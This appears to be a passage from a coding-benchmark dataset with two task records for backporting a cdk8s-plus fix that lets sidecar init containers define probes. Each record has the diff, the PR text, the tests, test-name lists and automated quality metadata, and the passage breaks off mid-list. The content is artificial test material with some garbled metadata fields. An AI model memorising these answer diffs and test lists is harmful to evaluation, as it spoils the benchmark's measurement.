an optional `seccompProfile`. The test suite directly checks that the property is stored correctly and that invalid configurations raise the expected error.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 44, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/4499", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding seccompProfile support to Container security context but provides no details on the API shape or validation rules, making the specification ambiguous (B4). The tests also expect a specific enum name SecormProfileType and its values, which were not mentioned in the issue, indicating implicit naming requirements (B2). No other coupling or external dependencies are evident, and the tests align with the intended implementation.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
189074087c2bd858d77316ece86d98c4ab47a3c8
2024-08-27 10:52:19
cdk8s-team__cdk8s-plus-4574
diff --git a/src/pod.ts b/src/pod.ts index c7f4ea6b..3ac602bc 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -122,15 +122,15 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public addInitContainer(cont: container.ContainerProps): container.Container { // https://kubernetes.io/docs/concepts/workloads/pods/init-containers/#differences-from-regular-containers - if (cont.readiness) { + if (!this.isSidecarContainer(cont) && cont.readiness) { throw new Error('Init containers must not have a readiness probe'); } - if (cont.liveness) { + if (!this.isSidecarContainer(cont) && cont.liveness) { throw new Error('Init containers must not have a liveness probe'); } - if (cont.startup) { + if (!this.isSidecarContainer(cont) && cont.startup) { throw new Error('Init containers must not have a startup probe'); } @@ -143,6 +143,13 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, return impl; } + // Any initContainer that has `restartPolicy=Always` is a sidecar container. Please refer to + // documentation for more details: + // https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/#differences-from-init-containers + private isSidecarContainer(cont: container.ContainerProps) { + return cont.restartPolicy === container.ContainerRestartPolicy.ALWAYS; + } + public addHostAlias(hostAlias: HostAlias): void { this._hostAliases.push(hostAlias); }
fix(pod): allow sidecar containers to have probes (#4483) # Backport This will backport the following commits from `k8s-30/main` to `k8s-28/main`: - [fix(pod): allow sidecar containers to have probes (#4483)](https://github.com/cdk8s-team/cdk8s-plus/pull/4483) <!--- Backport version: 8.9.9 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Allow sidecar init containers to define readiness, liveness and startup probes **Problem** Init containers are prohibited from having probes, but init containers that are actually sidecars (declared with a restart policy of Always) need to be able to use probes. The existing validation incorrectly rejects these sidecar containers. **Root Cause** The probe‑restriction logic treats every init container the same and does not distinguish sidecar containers. **Fix / Expected Behavior** - Detect when an init container is a sidecar based on its restart policy. - Skip the probe‑restriction checks for such sidecar init containers. - Preserve the prohibition of probes for regular init containers. - Keep existing init‑container handling unchanged apart from the sidecar exemption. **Risk & Validation** - Verify that regular init containers still throw errors when probes are provided. - Confirm that sidecar init containers can successfully set readiness, liveness, and startup probes. - Run the full test suite and add targeted tests for sidecar init‑container scenarios.
4,574
cdk8s-team/cdk8s-plus
diff --git a/test/pod.test.ts b/test/pod.test.ts index 977e64da..17f44567 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -254,6 +254,45 @@ test('init containers cannot have startup probe', () => { }); +test('sidecar containers can have liveness probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', liveness: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].livenessProbe).toBeTruthy(); + +}); + +test('sidecar containers can have readiness probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', readiness: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].readinessProbe).toBeTruthy(); + +}); + +test('sidecar containers can have startup probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', startup: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].startupProbe).toBeTruthy(); + +}); + test('can specify init containers at instantiation', () => { const chart = Testing.chart();
[ "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe" ]
[ "defaultChild", "defaults", "can select namespaces", "can select all namespaces", "fromCommand", "fromHttpGet", "fromTcpSocket", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be isolated", "default configuration", "custom configuration", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "Can mutate metadata", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added" ]
Method: AbstractPod.addInitContainer(cont: container.ContainerProps) Location: src/pod.ts – class AbstractPod (extends base.Resource) Inputs: - **cont** – `container.ContainerProps` describing the init container. Important fields: • `image` (string, required) • `restartPolicy` (`container.ContainerRestartPolicy`) – when set to `ALWAYS` the container is treated as a side‑car. • Optional probe definitions `liveness`, `readiness`, `startup` of type `Probe`. • Probes are accepted **only** when `restartPolicy === ContainerRestartPolicy.ALWAYS`; otherwise they cause an error. Outputs: Returns the created `container.Container` object that is added to the pod’s `initContainers` array and will be rendered in the synthesized manifest (e.g., `spec.initContainers[0].livenessProbe` when a side‑car probe is supplied). Description: Adds an init container to a pod. The method now permits side‑car containers (identified by `restartPolicy: ALWAYS`) to include liveness, readiness, and startup probes, whereas regular init containers are still prohibited from having these probes.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 10, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.9, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/sqren/backport", "https://github.com/cdk8s-team/cdk8s-plus/pull/4483" ], "intent_completeness": "insufficient", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue only states a backport of a fix without describing the expected behavior, while the tests assert that init containers with restartPolicy=Always (sidecars) may have liveness/readiness/startup probes. The tests therefore introduce requirements that are not present in the issue description, indicating an ambiguous specification. Since the test expectations are not derived from the issue text, the primary problem is a missing or incomplete specification.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests assert sidecar containers can have probes, which is not mentioned in the issue description" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
bcd98f94e402475318f7a340f752185daf9707b1
2024-08-27 10:52:22
cdk8s-team__cdk8s-plus-4575
diff --git a/src/pod.ts b/src/pod.ts index c7f4ea6b..3ac602bc 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -122,15 +122,15 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public addInitContainer(cont: container.ContainerProps): container.Container { // https://kubernetes.io/docs/concepts/workloads/pods/init-containers/#differences-from-regular-containers - if (cont.readiness) { + if (!this.isSidecarContainer(cont) && cont.readiness) { throw new Error('Init containers must not have a readiness probe'); } - if (cont.liveness) { + if (!this.isSidecarContainer(cont) && cont.liveness) { throw new Error('Init containers must not have a liveness probe'); } - if (cont.startup) { + if (!this.isSidecarContainer(cont) && cont.startup) { throw new Error('Init containers must not have a startup probe'); } @@ -143,6 +143,13 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, return impl; } + // Any initContainer that has `restartPolicy=Always` is a sidecar container. Please refer to + // documentation for more details: + // https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/#differences-from-init-containers + private isSidecarContainer(cont: container.ContainerProps) { + return cont.restartPolicy === container.ContainerRestartPolicy.ALWAYS; + } + public addHostAlias(hostAlias: HostAlias): void { this._hostAliases.push(hostAlias); }
fix(pod): allow sidecar containers to have probes (#4483) # Backport This will backport the following commits from `k8s-30/main` to `k8s-29/main`: - [fix(pod): allow sidecar containers to have probes (#4483)](https://github.com/cdk8s-team/cdk8s-plus/pull/4483) <!--- Backport version: 8.9.9 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Allow sidecar init containers to define readiness, liveness, and startup probes **Problem** Init containers are prohibited from having probes, but sidecar containers (a special type of init container with an always‑restart policy) need to be able to specify them. The existing validation prevented sidecars from adding probes, causing deployment failures for workloads that rely on sidecar health checks. **Root Cause** The probe‑restriction logic treated all init containers uniformly and did not distinguish sidecar containers based on their restart policy. **Fix / Expected Behavior** - Detect when an init container is a sidecar by checking its restart policy. - Exempt sidecar containers from the “no probes” validation. - Preserve the prohibition of probes for regular init containers. - Preserve existing behavior for other container types. **Risk & Validation** - Verify that regular init containers still reject probes. - Add tests confirming sidecar init containers can successfully define readiness, liveness, and startup probes. - Run the full test suite to ensure no regressions in pod handling logic.
4,575
cdk8s-team/cdk8s-plus
diff --git a/test/pod.test.ts b/test/pod.test.ts index 977e64da..17f44567 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -254,6 +254,45 @@ test('init containers cannot have startup probe', () => { }); +test('sidecar containers can have liveness probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', liveness: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].livenessProbe).toBeTruthy(); + +}); + +test('sidecar containers can have readiness probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', readiness: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].readinessProbe).toBeTruthy(); + +}); + +test('sidecar containers can have startup probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', startup: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].startupProbe).toBeTruthy(); + +}); + test('can specify init containers at instantiation', () => { const chart = Testing.chart();
[ "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe" ]
[ "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "defaultChild", "can select namespaces", "can select all namespaces", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "fromCommand", "fromHttpGet", "fromTcpSocket", "Can mutate metadata", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "targets a deployment that has containers with volume mounts", "default configuration", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when 